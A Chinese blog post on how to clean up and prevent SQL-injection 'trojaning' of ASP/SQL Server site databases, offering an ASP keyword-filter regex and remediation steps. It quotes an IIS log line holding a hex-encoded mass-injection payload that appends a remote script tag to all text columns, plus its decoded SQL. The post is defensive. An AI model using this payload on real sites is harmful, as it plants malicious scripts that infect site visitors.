数据库挂马的解决方法

最新推荐文章于 2024-07-12 14:26:59 发布
最新推荐文章于 2024-07-12 14:26:59 发布
阅读量489 收藏
点赞数
分类专栏: 黑防技巧 数据库 文章标签: 数据库 table sql iis c sql server
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wfyxing/article/details/3722077
版权

最近流行的数据库挂马的解决方法
      网站数据库中个别表的数据经常被修改并挂马,原因可能是接收参数的时候没有过滤危险字符,于是就加上了接受参数的格式化函数,数据库连接文件中把接受参数时出现的“;”替换成“;”。分号替换如没有起到作用。
  很多数据库SQL注入挂马的例子,看来这段时间这种挂马手段很流行,并且只是针对Asp+Sql Server的网站,只有你网站代码存在SQL注入的漏洞,就可能会被挂马,而且只针对文本型的字段char/text类似的字段,修改之后的数据后面基本上都是js,1.js,b.js等。
  先找防止SQL注入的方法,在网上搜索到以下代码,把该代码加到数据库连接文件中:
<%
Response.Buffer = True
Const EnableStopInjection = True
If EnableStopInjection = True Then
    If Request.QueryString <> "" Then Call StopInjection(Request.QueryString)
    If Request.Cookies <> "" Then Call StopInjection(Request.Cookies)
    If Request.Form <> "" Then Call StopInjection(Request.Form)
End If
Sub StopInjection(Values)
Dim regEx
Set regEx = New RegExp
    regEx.IgnoreCase = True
    regEx.Global = True
    regEx.Pattern = "'|;|#|([/s/b+()]+([email=select%7Cupdate%7Cinsert%7Cdelete%7Cdeclare%7C@%7Cexec%7Cdbcc%7Calter%7Cdrop%7Ccreate%7Cbackup%7Cif%7Celse%7Cend%7Cand%7Cor%7Cadd%7Cset%7Copen%7Cclose%7Cuse%7Cbegin%7Cretun%7Cas%7Cgo%7Cexists)[/s/b]select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|retun|as|go|exists)[/s/b[/email]+]*)"
    Dim sItem, sValue
    For Each sItem In Values
        sValue = Values(sItem)
        If regEx.Test(sValue) Then
            Response.Write "检测到SQL注入危险, 请确认你提交的信息。"
            Response.End
        End If
    Next
    Set regEx = Nothing
End Sub
%>
  注意:regEx.Pattern中的值根据你的需要设置,如设置不当,则一般提交的信息也会提示有SQL注入。
 


从空间商那要IIS日志,查看日志发现被SQL注入的具体网址与方法,如:
2008-12-23 16:01:31 GET /xxx.asp id=90;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E616477626E722E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- - 201.8.166.17 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - www.xxx.com 200 0 271 1432 406
  中间那段代码解密之后就是:
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’+@T+’] set [’+@C+’]=
rtrim(convert(varchar,[’+@C+’]))+
”挂马内容”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
  并且,这个SQL注入隔几十分钟一次,可见这种人多么卑鄙。
  如果网站IIS日志比较大,则可以考虑“IIS网站日志导入分析工具”帮你查询分析。
  最后总结一下,如果数据库数据库被修改并挂马:
  1、先看IIS日志,被注入的页面是哪些,然后修改那些页面的代码,防止SQL注入。
  2、如果没有IIS日志,也找不到被利用的页面,那就使用上面说的在数据库连接文件中加入那些代码。
  

wfyxing
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
讲解SQL Server数据库解决方案
08-04
一个网站遭遇入侵,破坏相当严重,SQL数据库,所有的表里面大部分字段都被多次重复插入代码,查看日志,还好没有涉及到服务器的安全,只是数据库那里出现了很多异常警告而已,网站确实存在漏洞。...
通信与网络中的讲解SQL Server数据库解决方案
11-18
一个网站遭遇入侵,破坏相当严重,SQL数据库,所有的表里面大部分字段都被多次重复插入代码,查看日志,还好没有涉及到服务器的安全,只是数据库那里出现了很多异常警告而已,网站确实存在漏洞 ...
SQL server数据库恢复起的解决办法
热门推荐
HopperZheng的博客
04-09 3万+
在我们进行项目开发时候经常使用数据库,SQL Server数据库已经成为我们熟悉的数据库,而我们只了解常用的功能,对于一些没有出现过的问题有点不知所措,总结是在实际情况遇到问题的收获,希望能够帮助到你!第一种解决办法:权限问题,把SQL Server启动账号改为具有完全控制权限的本地账号,停止SQL服务并重新启动1、ctrl+r运行 输入services.msc,进...
SQL Server处于恢复已起状态的解决方法
AmeliaPP的博客
08-18 1841
win + r 输入 services.msc,进入服务!找到SQL Server(MSSQLSERVER)点击重启
linux mysql _解决数据库最快方法
weixin_36372014的博客
02-01 297
如果你的数据库中被写入了 类似的木,您可以采用这个方法快速的删除木!新建存储过程,然后允许就可以了Create PROCEDURE dbo.ss ASdeclare @t varchar(555),@c varchar(555) ,@inScript varchar(8000)set @inScript=''declare table_cursor cursor for select a.na...
mysql_虚拟主机/数据库清理方法
weixin_39977136的博客
01-28 291
浏览器输入域名打开网页后,点击空白处,鼠标右键,查看源码/查看源文件;若程序禁止了鼠标右键,点击浏览器上的工具-查看源码(ie浏览器-页面-查看源码)查看源码底部有如下截图的链接或者进入业务管理-虚拟主机管理-管理-文件管理,点击wwwroot进入,找到您的首页,如index.html,index.php,default.asp,home.html等,双击首页文件打开删除截图中的一段代码,并保存修...
检查mysql被_对付数据库有绝招
weixin_29148445的博客
01-31 478
我的网站老是报这个毒trojandownloader,有人说可能是数据库了,但是数据库我一点都不懂呀,请大家帮帮忙,教我如何解决该问题呢?数据库,相信很多人都碰到过。在这里,小编讲下ASP数据库的编程处理方法,你可以试用下,对你是否有帮助.第一步:为现有数据库做好备份。第二步:执行如下ASP文件,这样就可以去掉数据库当中的JS木:注:conn.asp自己去写了。’这里放入JS木...
数据库解决的SQL代码
lhsxsh的专栏
12-28 1167
 我主要查看了 http://www.it.com.cn/f/market/089/24/663347.htm /***********定义要去除的字符,请注意,可能不止一条,我的服务器就查到两条你们看自己被注入的内容为主。 ************/declare @delStr nvarchar(500)set @delStr=--set @delStr=/**********
dedecms index.php,dedecms被常见解决方法
weixin_39733146的博客
03-19 804
dedecms被常见解决方法dedecms类型及解决方式:1、90sec.php木我想这个木程序,凡是用过织梦程序且中过该木的站长们,应该都不陌生,此木极其难缠,删了,第二天又会出现,这是因为没有找到根本原因所在,具体解决办法是在include/dedesql.class.php 找到$v2 .= chr($arrs2[$i]); 将其注释掉。if(isset($GLOBALS['...
SQL Server数据库解决办法
Venus's Blog
08-20 612
sql数据库解决办法:  正确清理木,注意数据库不能随便修改或删除,被后,更需要谨慎的操作。建议,先备份然后再小心清理。  如果以前没有备份的话,就利用以下的sql命令进行修复:每个表里面去执行一下这个sql语句update tablename set @ziduanming =replace(cast(@ziduanming as varchar(8000)),’
数据库中的内容字段被的替换方法 SQL注入
12-15
在本文中,我们将讨论如何处理数据库内容字段被(即植入恶意代码)的情况,特别关注SQL Server环境。 【处理方法】 1. **数据备份**:在进行任何数据清理操作之前,务必先备份数据库。这样,如果在清理过程中...
数据库解决办法
03-25
对SQL数据库清除木,重新恢复数据库。并且记录木程序
ASP.Net网站数据库后手动清除一例
03-16
ASP.NET网站数据库是一种常见的网络安全问题,它通常发生在网站遭受恶意攻击后,攻击者在网站的数据库或代码中植入恶意脚本...通过实施上述步骤,我们可以有效地排查和解决问题,同时提升网站的整体安全性。
mysql批量删除_批量替换sqlserver数据库字段并防范sql注入攻击的代码
weixin_31301881的博客
02-08 106
有时候网站sqlserver数据库了,网上的很多软件与方法都是针对text小于8000的,这里的方法貌似可行,需要的朋友可以参考下。首先备份数据库,以防不必要的损失。而后对所有被的小于8000字符的varchar字段执行代码如下:update 表名 set 字段名=replace(字段名,'','')其中为字段。执行后字段被清除。但是有部分字段,比如内容字段等大于8000字符的v...
set user & password for database 设置数据库 用户和密码
最新发布
DavidsonGong的博客
07-12 160
USE sbms;
7.10飞书一面面经
东篱君的博客
07-10 1235
B+树的⾮叶⼦节点不存放实际的记录数据,仅存放索引,所以数据量相同的情况下,相⽐存储即存索引⼜存记录的 B 树,B+树的⾮叶⼦节点可以存放更多的索引,因此 B+ 树可以⽐ B 树更「矮胖」,查询底层节点的磁盘 I/O次数会更少。主从复制:单节点Redis的并发能力是有上限的,要进一步提高Redis的并发能力,可以搭建主从集群,实现读写分离。B+ 树有⼤量的冗余节点(所有⾮叶⼦节点都是冗余索引),这些冗余索引让 B+ 树在插⼊、删除的效率都更⾼,⽐如删除根节点的时候,不会像 B 树那样会发⽣复杂的树的变化;
mysql笔记1
m0_62975692的博客
07-11 390
首先查看systemctl status mysqld,如果是关闭的可以进入的配置文件打开mysql,我的mysql配置文件就是在/usr/local/mysql/support-filess/下,在此目录下执行./mysql.server start,打开mysql服务,也可以通过systmectl start mysqld,如果你嫌麻烦的话可以systemctl enable mysqld 一直打开mysql的服务;重新给字段添加约束的时候不可以添加not null约束的!
thinkphp扫描软件
10-07
指的是黑客通过植入恶意脚本或程序来控制网站或服务器,以达到非法盈利或攻击的目的。为了保护网站和服务器的安全,扫描软件可以用来检测漏洞。 ThinkPHP扫描软件是专门针对ThinkPHP框架的安全扫描工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值